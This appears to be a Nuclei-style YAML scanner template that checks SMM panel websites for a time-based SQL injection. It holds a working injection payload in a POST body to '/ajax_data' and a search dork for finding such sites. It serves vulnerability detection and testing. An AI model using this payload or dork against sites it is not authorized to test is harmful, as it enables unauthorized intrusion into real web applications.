id: smm-panel-sqli

info:
  name: Time-based SQL Injection Detection
  author: aether
  severity: critical
  description: |
    Detects a time-based SQL Injection vulnerability in the `service_detail` parameter via a POST request.
  tags: sqli, mysql, timing,dork:'intitle:"#1 SMM Panel ****"' "smm panel"
  reference:
    - https://owasp.org/www-community/attacks/SQL_Injection

requests:
  - method: POST
    path:
      - "{{BaseURL}}/ajax_data"

    headers:
      Content-Type: "application/x-www-form-urlencoded"

    body: "action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z"

    matchers:
      - type: dsl
        dsl:
          - "duration > 5"